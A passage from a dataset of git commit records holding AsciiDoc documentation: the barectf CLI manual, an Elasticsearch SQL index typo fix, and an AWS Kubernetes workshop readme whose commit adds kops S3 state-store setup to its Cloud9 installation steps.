exit.\n\n[[version-option]]`-V`::\n`--version`::\n Print the version of `barectf` and exit.\n\n[[generate-command]]\n== `generate` command\n\n=== Synopses\n\nGenerate files from configuration file:\n\n[.cl]\n[verse]\n*barectf generate* pass:[[]xref:#generate-prefix-option[--prefix]=__PREFIX__] pass:[[]xref:#generate-metadata-dir-option[--metadata-dir]=__MDIR__]\n 
pass:[[]xref:#generate-headers-dir-option[--headers-dir]=__HDIR__] pass:[[]xref:#generate-code-dir-option[--code-dir]=__CDIR__]\n pass:[[]xref:#generate-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#generate-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf generate* xref:#generate-help-option[--help]\n\n=== Command name aliases\n\n* `gen`\n\n=== Description\n\nThe `barectf generate` command reads the xref:yaml:index.adoc[YAML\nconfiguration file] `__CONFIG-PATH__` to produce:\n\n[%autowidth.stretch, cols=\"d,a\"]\n|===\n|File name |Description\n\n|`__MDIR__\/metadata`\n|The CTF metadata stream file.\n\n|`__HDIR__\/__FPREFIX__.h`\n|The generated tracer's public C{nbsp}header file.\n\n|`__HDIR__\/__FPREFIX__-bitfield.h`\n|Internal macros for the generated tracer (included by `__FPREFIX__.c`).\n\n|`__CDIR__\/__FPREFIX__.c`\n|The generated tracer's C{nbsp}source code.\n|===\n\nSee xref:lel[Build the generated C{nbsp}source code] to learn how to\nbuild the C{nbsp}source which the `generate` command produces.\n\nIn the list above, `__FPREFIX__` is:\n\nWithout the <<generate-prefix-option,`--prefix`>> option::\n If the `__CONFIG-PATH__` file has a file name xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]:::\n The `__CONFIG-PATH__` file's file name prefix option.\n Otherwise:::\n `barectf`\n\nWith the <<generate-prefix-option,`--prefix`>> option::\n `__PREFIX__`, without trailing underscores.\n+\nFor example, if `__PREFIX__` is `my_tracer_`, then `__FPREFIX__` is\n`my_tracer`.\n\nBy default, `__MDIR__`, `__HDIR__`, and `__CDIR__` are the current\nworking directory. Use the\n<<generate-metadata-dir-option,`--metadata-dir`>>,\n<<generate-headers-dir-option,`--headers-dir`>>, and\n<<generate-code-dir-option,`--code-dir`>> to specify other output\ndirectories.\n\nTherefore, by default, the `generate` command writes the `metadata`,\n`barectf.h`, `barectf-bitfield.h`, and `barectf.c` files to the current\nworking directory.\n\nIf you use the <<prefix-option,`--prefix`>> option, then all the\npublic C{nbsp}identifiers in `__FPREFIX__.h` and `__FPREFIX__.c` begin\nwith `__PREFIX__`. Otherwise, they begin with:\n\nIf the `__CONFIG-PATH__` file has an identifier prefix option::\n The `__CONFIG-PATH__` file's identifier prefix option.\n\nOtherwise::\n `barectf_`\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<generate-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. 
Force\n`barectf generate` to continue silently instead with its\n<<generate-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[generate-code-dir-option]]`-c __CDIR__`::\n`--code-dir=__CDIR__`::\n Write the C{nbsp}source file to the directory `__CDIR__` instead of\n the current working directory.\n\n[[generate-headers-dir-option]]`-H __HDIR__`::\n`--headers-dir=__HDIR__`::\n Write C{nbsp}header files to the directory `__HDIR__` instead of\n the current working directory.\n\n[[generate-help-option]]`-h`::\n`--help`::\n Print the `generate` command's brief help and exit.\n\n[[generate-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[generate-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the standard inclusion files\n (like `stdint.yaml`).\n\n[[generate-metadata-dir-option]]`-m __MDIR__`::\n`--metadata-dir=__MDIR__`::\n Write the CTF metadata stream file to the directory `__MDIR__`\n instead of the current working directory.\n\n[[generate-prefix-option]]`-p __PREFIX__`::\n`--prefix=__PREFIX__`::\n Override the default or `__CONFIG-PATH__` file's file and\n identifier prefixes with:\n+\nFile name prefix:::\n `__PREFIX__`, without trailing underscores.\nIdentifier prefix:::\n `__PREFIX__`\n\n+\n--\nThe default file name prefix is `barectf`.\n\nThe default identifier prefix is `barectf_`.\n--\n\n[[show-effective-configuration-command]]\n== `show-effective-configuration` command\n\n=== Synopses\n\nShow effective configuration:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* pass:[[]xref:#show-effective-configuration-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#show-effective-configuration-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* xref:#show-effective-configuration-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-effective-config`\n* `show-effective-cfg`\n\n=== Description\n\nThe `barectf show-effective-configuration` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints an equivalent, _effective_ YAML configuration.\n\nSee the xref:yaml:index.adoc#stages[processing stages] of a YAML\nconfiguration file to learn what an effective configuration is.\n\nMoreover, the `show-effective-configuration` command validates the\n`__CONFIG-PATH__` file. In other words, if the command\n<<exit-status,exits>> with status{nbsp}0, the\n<<generate-command,`generate` command>> using the same options and\n`__CONFIG-PATH__` file would also succeed.\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<show-effective-configuration-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. 
Force\n`barectf show-effective-configuration` to continue silently instead\nwith its\n<<show-effective-configuration-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[show-effective-configuration-help-option]]`-h`::\n`--help`::\n Print the `show-effective-configuration` command's\n brief help and exit.\n\n[[show-effective-configuration-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[show-effective-configuration-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the standard inclusion files\n (like `stdint.yaml`).\n\n[[show-configuration-version-command]]\n== `show-configuration-version` command\n\n=== Synopses\n\nShow configuration file's version:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* xref:#show-configuration-version-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-config-version`\n* `show-cfg-version`\n\n=== Description\n\nThe `barectf show-configuration-version` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints its version, which is either 2 or 3.\n\nThe `show-configuration-version` does _not_ validate the\n`__CONFIG-PATH__` file.\n\n=== Options\n\n[[show-configuration-version-help-option]]`-h`::\n`--help`::\n Print the `show-configuration-version` command's brief help\n and exit.\n\n[[exit-status]]\n== Exit status\n\n0::\n Success\n\nNot 0::\n Error\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0b4b59c7849ce9be2aaaf60143df93688e5381e1","subject":"[DOCS] Fix typo (#68362) (#68380)","message":"[DOCS] Fix typo (#68362) (#68380)\n\nCo-authored-by: Jaskaran Bindra <32cdd33851e443e493b8cdca06f49bb0b764186d@gmail.com>","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/sql\/index.asciidoc","new_file":"docs\/reference\/sql\/index.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[xpack-sql]]\n= SQL access\n\n:sql-tests: {xes-repo-dir}\/..\/..\/plugin\/sql\/qa\/\n:sql-specs: {sql-tests}server\/src\/main\/resources\/\n:jdbc-tests: {sql-tests}jdbc\/src\/main\/java\/org\/elasticsearch\/xpack\/sql\/qa\/jdbc\n:security-tests: {sql-tests}server\/security\/src\/test\/java\/org\/elasticsearch\/xpack\/sql\/qa\/security\n:es-sql: Elasticsearch SQL\n\n[partintro]\n--\n\nX-Pack includes a SQL feature to execute SQL queries against {es}\nindices and return results in tabular format.\n\nThe following chapters aim to cover everything from usage, to syntax and drivers.\nExperienced users or those in a hurry might want to jump directly to\nthe list of SQL <<sql-commands, commands>> and <<sql-functions, functions>>.\n\n<<sql-overview, Overview>>::\n Overview of {es-sql} and its features.\n<<sql-getting-started, Getting Started>>::\n Start using SQL right away in {es}.\n<<sql-concepts, Concepts and Terminology>>::\n Language conventions across SQL and 
{es}.\n<<sql-security,Security>>::\n Secure {es-sql} and {es}.\n<<sql-rest,REST API>>::\n Execute SQL in JSON format over REST.\n<<sql-translate,Translate API>>::\n Translate SQL in JSON format to {es} native query.\n<<sql-cli,CLI>>::\n Command-line application for executing SQL against {es}.\n<<sql-jdbc,JDBC>>::\n JDBC driver for {es}.\n<<sql-odbc,ODBC>>::\n ODBC driver for {es}.\n<<sql-client-apps,Client Applications>>::\n Setup various SQL\/BI tools with {es-sql}.\n<<sql-spec,SQL Language>>::\n Overview of the {es-sql} language, such as supported data types, commands and\n syntax.\n<<sql-functions,Functions and Operators>>::\n List of functions and operators supported.\n<<sql-limitations,Limitations>>::\n {es-sql} current limitations.\n--\n\ninclude::overview.asciidoc[]\ninclude::getting-started.asciidoc[]\ninclude::concepts.asciidoc[]\ninclude::security.asciidoc[]\ninclude::endpoints\/index.asciidoc[]\ninclude::language\/index.asciidoc[]\ninclude::functions\/index.asciidoc[]\ninclude::appendix\/index.asciidoc[]\ninclude::limitations.asciidoc[]\n\n:jdbc-tests!:\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[xpack-sql]]\n= SQL access\n\n:sql-tests: {xes-repo-dir}\/..\/..\/plugin\/sql\/qa\/\n:sql-specs: {sql-tests}server\/src\/main\/resources\/\n:jdbc-tests: {sql-tests}jdbc\/src\/main\/java\/org\/elasticsearch\/xpack\/sql\/qa\/jdbc\n:security-tests: {sql-tests}server\/security\/src\/test\/java\/org\/elasticsearch\/xpack\/sql\/qa\/security\n:es-sql: Elasticsearch SQL\n\n[partintro]\n--\n\nX-Pack includes a SQL feature to execute SQL queries against {es}\nindices and return results in tabular format.\n\nThe following chapters aim to cover everything from usage, to syntax and drivers.\nExperience users or those in a hurry might want to jump directly to \nthe list of SQL <<sql-commands, commands>> and <<sql-functions, functions>>.\n\n<<sql-overview, Overview>>::\n Overview of {es-sql} and its features.\n<<sql-getting-started, Getting Started>>::\n Start using SQL right away in {es}.\n<<sql-concepts, Concepts and Terminology>>::\n Language conventions across SQL and {es}.\n<<sql-security,Security>>::\n Secure {es-sql} and {es}.\n<<sql-rest,REST API>>::\n Execute SQL in JSON format over REST.\n<<sql-translate,Translate API>>::\n Translate SQL in JSON format to {es} native query.\n<<sql-cli,CLI>>::\n Command-line application for executing SQL against {es}.\n<<sql-jdbc,JDBC>>::\n JDBC driver for {es}.\n<<sql-odbc,ODBC>>::\n ODBC driver for {es}.\n<<sql-client-apps,Client Applications>>::\n Setup various SQL\/BI tools with {es-sql}.\n<<sql-spec,SQL Language>>::\n Overview of the {es-sql} language, such as supported data types, commands and\n syntax.\n<<sql-functions,Functions and Operators>>::\n List of functions and operators supported.\n<<sql-limitations,Limitations>>::\n {es-sql} current limitations.\n--\n\ninclude::overview.asciidoc[]\ninclude::getting-started.asciidoc[]\ninclude::concepts.asciidoc[]\ninclude::security.asciidoc[]\ninclude::endpoints\/index.asciidoc[]\ninclude::language\/index.asciidoc[]\ninclude::functions\/index.asciidoc[]\ninclude::appendix\/index.asciidoc[]\ninclude::limitations.asciidoc[]\n\n:jdbc-tests!:\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"727efd600cb48c9605b416d55c8491519e065ac4","subject":"Formatting and fixes from chime (4)","message":"Formatting and fixes from chime 
(4)\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"01-path-basics\/101-start-here\/readme.adoc","new_file":"01-path-basics\/101-start-here\/readme.adoc","new_contents":"= Kubernetes - Setup Cloud9 Development Environment\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n:toc:\n\nThis tutorial will walk you through the process of creating a Kubernetes development environment using https:\/\/aws.amazon.com\/cloud9\/[AWS Cloud9]. This will provide you with a cloud-based integrated development environment (IDE) that will let you write, run and debug containerized workloads with just a web browser.\n\n== Create AWS Cloud9 Environment\n=== AWS Cloud9 Console\n\n[NOTE]\nIf you are experienced with Cloud9, kubectl, kops, and git (_or if you just want a working development environment quickly_), please skip to xref:cfn[automated deployment using CloudFormation.]\n\nFirst, Log into the AWS Cloud9 Console. AWS Cloud9 is only available in 5 regions currently. Please choose the region closest to you geographically.\n\n[cols=\"2*^\"]\n|===\n| *N. Virginia* (us-east-1)\n|link:https:\/\/us-east-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ohio* (us-east-2)\n|link:https:\/\/us-east-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Oregon* (us-west-2)\n|link:https:\/\/us-west-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ireland* (eu-west-1)\n|link:https:\/\/eu-west-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Singapore* (ap-southeast-1)\n|link:https:\/\/ap-southeast-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n|===\n\nOnce there, follow these steps:\n\n1. Provide a name for your environment. Feel free to use something simple, such as `kubernetes-development`. Then click \"Next Step\".\n\n2. Change the \"Instance Type\" to `t2.small (2 GiB RAM + 1 vCPU)`.\n\n3. Expand the \"Network settings (advanced)\" section and make sure you are using the default VPC. It will have \"(default)\" next to the name. If you do not have a default VPC listed, it is recommended that you create a \"Single Public Subnet\" VPC by clicking the \"Create new VPC\" button and following the wizard it presents.\n\n4. If everything is correct, click the \"Next Step\" button.\n\n5. Review the configuration to ensure everything is correct and then click the \"Create environment\" button.\n\nThis will close the wizard and you will be taken to a screen informing you that your new AWS Cloud9 environment is being created. Once this is completed, the IDE will open to the following screen:\n\nimage:cloud9-development-environment-welcome.png[]\n\nYour environment is now ready to be setup for working with Kubernetes and the rest of this workshop.\n\n=== Set up Environment\n\nYour AWS Cloud9 environment comes with many useful tools preinstalled, but there are still a few tweaks to these and additional tools you will need to support working with Kubernetes.\n\n=== Configure the AWS CLI\n\nYour AWS Cloud9 environment comes with the AWS CLI preinstalled and configured to automatically use the credentials of the currently logged in user. 
Make sure you are logged in as a user with link:aws-permissions.adoc[these permissions.]\n\n[NOTE]\n*********************\nIt is not recommended that you change the default AWS CLI config in your AWS Cloud9 environment. Instead, it is recommended that you provide the logged in user's account the permissions needed to make any requests needed by your project. More information on this can be found by visiting: https:\/\/docs.aws.amazon.com\/cloud9\/latest\/user-guide\/credentials.html[Calling AWS Services from an Environment in AWS Cloud9]\n*********************\n\n[NOTE]\nAll the commands below should be run in the Terminal section of your Cloud9 GUI.\n\n=== Verify Docker Version\n\nDocker is preinstalled. You can verify the version by running the following:\n\n $ docker --version\n Docker version 17.06.2-ce, build 3dfb8343b139d6342acfd9975d7f1068b5b1c3d3\n\nYou should have a similar or newer version.\n\n=== Install Kubectl CLI\n\nInstall the Kubectl CLI:\n\n $ curl -Lo kubectl https:\/\/storage.googleapis.com\/kubernetes-release\/release\/v1.9.2\/bin\/linux\/amd64\/kubectl && chmod +x kubectl && sudo mv kubectl \/usr\/local\/bin\/\n\nAdd kubectl autocompletion to your current shell:\n\n $ source <(kubectl completion bash)\n\nYou can verify that kubectl is installed by executing the following command:\n\n $ kubectl version --client\n Client Version: version.Info{Major:\"1\", Minor:\"9\", GitVersion:\"v1.9.2\", GitCommit:\"6e937839ac04a38cac63e6a7a306c5d035fe7b0a\", GitTreeState:\"clean\", BuildDate:\"2017-09-28T22:57:57Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\n=== Install kops\n\nInstall kops using the following:\n\n $ curl -LO https:\/\/github.com\/kubernetes\/kops\/releases\/download\/$(curl -s https:\/\/api.github.com\/repos\/kubernetes\/kops\/releases\/latest | grep tag_name | cut -d '\"' -f 4)\/kops-linux-amd64\n $ chmod +x kops-linux-amd64\n $ sudo mv kops-linux-amd64 \/usr\/local\/bin\/kops\n\n=== Configure an S3 bucket for kops\n\nkops needs a \"`state store`\" to store configuration information of the cluster. We will use an S3 bucket with versioning enabled. A state store can work with multiple kops clusters.\n\n[NOTE]\nThe bucket name must be unique, otherwise you will encounter an error on deployment. We will use an example bucket name of `kops-state-store-` and add a randomly generated string to the end.\n\n $ export S3_BUCKET=kops-state-store-$(cat \/dev\/urandom | LC_ALL=C tr -dc \"[:alpha:]\" | tr '[:upper:]' '[:lower:]' | head -c 32)\n $ export KOPS_STATE_STORE=s3:\/\/${S3_BUCKET}\n $ aws s3 mb $KOPS_STATE_STORE\n $ aws s3api put-bucket-versioning --bucket $S3_BUCKET --versioning-configuration Status=Enabled\n\n=== Clone the repository\n\nThe workshop repository has configuration files that are used to create Kubernetes resources. You need to clone the repo to have access to those files:\n\n $ git clone https:\/\/github.com\/aws-samples\/aws-workshop-for-kubernetes\n\nAt this point, you should have everything you need to complete any of the sections of this workshop using your Cloud9 Environment.\n
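\nAs a quick sanity check (an illustrative step, not an official workshop instruction), you can confirm that the tools are on your PATH and that the kops state store bucket exists:\n\n # illustrative only: verify tool installs and the state store created above\n $ kubectl version --client\n $ kops version\n $ aws s3 ls $KOPS_STATE_STORE\n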
\nanchor:cfn[]\n\n== Automated Deployment using CloudFormation\n\nIt is possible to create and configure the Cloud9 development environment via CloudFormation.\n\nIf you've just completed the section above and have the git repository cloned in your Cloud9 environment, you do *not* need to deploy this CloudFormation template. You are ready to xref:next[move on!]\n\nThis CloudFormation template will create the Cloud9 IDE, the IAM Role required for kops, and the S3 bucket for the kops state store.\n\n|===\n\n|Region | Launch template with a new VPC | Launch template with an existing VPC\n| *N. Virginia* (us-east-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ohio* (us-east-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Oregon* (us-west-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ireland* (eu-west-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=eu-west-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=eu-west-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Singapore* (ap-southeast-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=ap-southeast-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=ap-southeast-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n|===\n\nTo open the Cloud9 IDE environment, click on the Outputs tab in the CloudFormation Console and open the Cloud9 URL\n\nhttps:\/\/console.aws.amazon.com\/cloud9\/ide\/<EnvironmentId>\n\nanchor:next[]\n\n== Build Script\n\nOnce your Cloud9 is ready, download the build script and install it in your IDE. This will prepare your IDE for running tutorials in this workshop. The build script will install the following:\n\n- jq\n- kubectl\n- kops\n- configures the AWS CLI and stores variables in bash_profile (for example AWS_AVAILABILITY_ZONES, KOPS_STATE_STORE, etc.)\n- creates an SSH key\n- clones the workshop repository into Cloud9\n\nTo install the script, run this command - again in the Terminal tab of the Cloud9 IDE:\n\n $ aws s3 cp s3:\/\/aws-kubernetes-artifacts\/lab-ide-build.sh . && chmod +x lab-ide-build.sh && .\/lab-ide-build.sh\n
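\nIf the variables the script stores in bash_profile (for example `KOPS_STATE_STORE`) are not visible in your current terminal, reload your profile first. This is a generic bash step, shown here as a hint rather than an official workshop instruction:\n\n # generic bash step: pick up variables written by the build script\n $ source ~\/.bash_profile\n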
\nOne last step is required so that the Cloud9 IDE uses the assigned IAM instance profile. Open the \"AWS Cloud9\" menu, go to \"Preferences\", go to \"AWS Settings\", and disable \"AWS managed temporary credentials\" as depicted in the diagram here:\n\nimage:cloud9-disable-temp-credentials.png[]\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\n\nThe next step is link:..\/102-your-first-cluster[to create a Kubernetes cluster using kops].\n\n== Workshop Cleanup\n\nOnce you have finished with the workshop, please don't forget to spin down your cluster or you will incur additional charges.\n(We will also remind you at the end!)\n\n==== Delete Kubernetes cluster resources\n\nIn your Cloud9 IDE, check whether any Kubernetes clusters are running\n\n kops get cluster\n\nDelete the Kubernetes cluster\n\n kops delete cluster example.cluster.k8s.local --yes\n\nWait until all resources are deleted by kops\n\n==== Delete Cloud9 Environment\n\nGo to the CloudFormation console, right-click the template with the name 'k8s-workshop' and select 'Delete Stack'\n\nThis should delete all the resources associated with this workshop\n","old_contents":"= Kubernetes - Setup Cloud9 Development Environment\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n:toc:\n\nThis tutorial will walk you through the process of creating a Kubernetes development environment using https:\/\/aws.amazon.com\/cloud9\/[AWS Cloud9]. This will provide you with a cloud-based integrated development environment (IDE) that will let you write, run and debug containerized workloads with just a web browser.\n\n== Create AWS Cloud9 Environment\n=== AWS Cloud9 Console\n\n[NOTE]\nIf you are experienced with Cloud9, kubectl, kops, and git (or if you just want a working development environment quickly), please skip to xref:cfn[automated deployment using CloudFormation.]\n\nFirst, Log into the AWS Cloud9 Console. AWS Cloud9 is only available in 5 regions currently. Please choose the region closest to you geographically.\n\n[cols=\"2*^\"]\n|===\n| *N. Virginia* (us-east-1)\n|link:https:\/\/us-east-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ohio* (us-east-2)\n|link:https:\/\/us-east-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Oregon* (us-west-2)\n|link:https:\/\/us-west-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ireland* (eu-west-1)\n|link:https:\/\/eu-west-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Singapore* (ap-southeast-1)\n|link:https:\/\/ap-southeast-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n|===\n\nOnce there, follow these steps:\n\n1. Provide a name for your environment. Feel free to use something simple, such as `kubernetes-development`. Then click \"Next Step\".\n\n2. Change the \"Instance Type\" to `t2.small (2 GiB RAM + 1 vCPU)`.\n\n3. Expand the \"Network settings (advanced)\" section and make sure you are using the default VPC. It will have \"(default)\" next to the name. If you do not have a default VPC listed, it is recommended that you create a \"Single Public Subnet\" VPC by clicking the \"Create new VPC\" button and following the wizard it presents.\n\n4. If everything is correct, click the \"Next Step\" button.\n\n5. 
Review the configuration to ensure everything is correct and then click the \"Create environment\" button.\n\nThis will close the wizard and you will be taken to a screen informing you that your new AWS Cloud9 environment is being created. Once this is completed, the IDE will open to the following screen:\n\nimage:cloud9-development-environment-welcome.png[]\n\nYour environment is now ready to be setup for working with Kubernetes and the rest of this workshop.\n\n=== Set up Environment\n\nYour AWS Cloud9 environment comes with many useful tools preinstalled, but there are still a few tweaks to these and additional tools you will need to support working with Kubernetes.\n\n=== Configure the AWS CLI\n\nYour AWS Cloud9 environment comes with the AWS CLI preinstalled and configured to automatically use the credentials of the currently logged in user. Make sure you are logged in as a user with link:aws-permissions.adoc[these permissions.]\n\n[NOTE]\n*********************\nIt is not recommended that you change the default AWS CLI config in your AWS Cloud9 environment. Instead, it is recommended that you provide the logged in user's account the permissions needed to make any requests needed by your project. More information on this can be found by visiting: https:\/\/docs.aws.amazon.com\/cloud9\/latest\/user-guide\/credentials.html[Calling AWS Services from an Environment in AWS Cloud9]\n*********************\n\n[NOTE]\nAll the commands below should be run in the Terminal section of your Cloud9 GUI.\n\n=== Verify Docker Version\n\nDocker is preinstalled. You can verify the version by running the following:\n\n $ docker --version\n Docker version 17.06.2-ce, build 3dfb8343b139d6342acfd9975d7f1068b5b1c3d3\n\nYou should have a similar or newer version. \n\n=== Install Kubectl CLI\n\nInstall the Kubectl CLI:\n\n $ curl -Lo kubectl https:\/\/storage.googleapis.com\/kubernetes-release\/release\/v1.9.2\/bin\/linux\/amd64\/kubectl && chmod +x kubectl && sudo mv kubectl \/usr\/local\/bin\/\n\nAdd kubectl autocompletion to your current shell:\n\n $ source <(kubectl completion bash)\n\nYou can verify that kubectl is installed by executing the following command:\n\n $ kubectl version --client\n Client Version: version.Info{Major:\"1\", Minor:\"9\", GitVersion:\"v1.9.2\", GitCommit:\"6e937839ac04a38cac63e6a7a306c5d035fe7b0a\", GitTreeState:\"clean\", BuildDate:\"2017-09-28T22:57:57Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\n=== Install kops\n\nInstall kops using the following:\n\n $ curl -LO https:\/\/github.com\/kubernetes\/kops\/releases\/download\/$(curl -s https:\/\/api.github.com\/repos\/kubernetes\/kops\/releases\/latest | grep tag_name | cut -d '\"' -f 4)\/kops-linux-amd64\n $ chmod +x kops-linux-amd64\n $ sudo mv kops-linux-amd64 \/usr\/local\/bin\/kops\n\n=== Clone the repository\n\nThe workshop repository has configuration files that are used to create Kubernetes resources. You need to clone the repo to have access to those files:\n\n $ git clone https:\/\/github.com\/aws-samples\/aws-workshop-for-kubernetes\n\nAt this point, you should have everything you need to complete any of the sections of the this workshop using your Cloud9 Environment.\n\nanchor:cfn[]\n\n== Automated Deployment using CloudFormation\n\nIt is possible to create and configure the Cloud9 development environment via CloudFormation.\n\nIf you've just completed the section above and have the git repository cloned in your Cloud9 environment, you do *not* need to deploy this CloudFormation template. 
You are ready to xref:next[move on!]\n\nThis CloudFormation template will create the Cloud9 IDE, IAM Role required for kops and S3 bucket for kops state store.\n\n|===\n\n|Region | Launch template with a new VPC | Launch template with an existing VPC\n| *N. Virginia* (us-east-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ohio* (us-east-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| 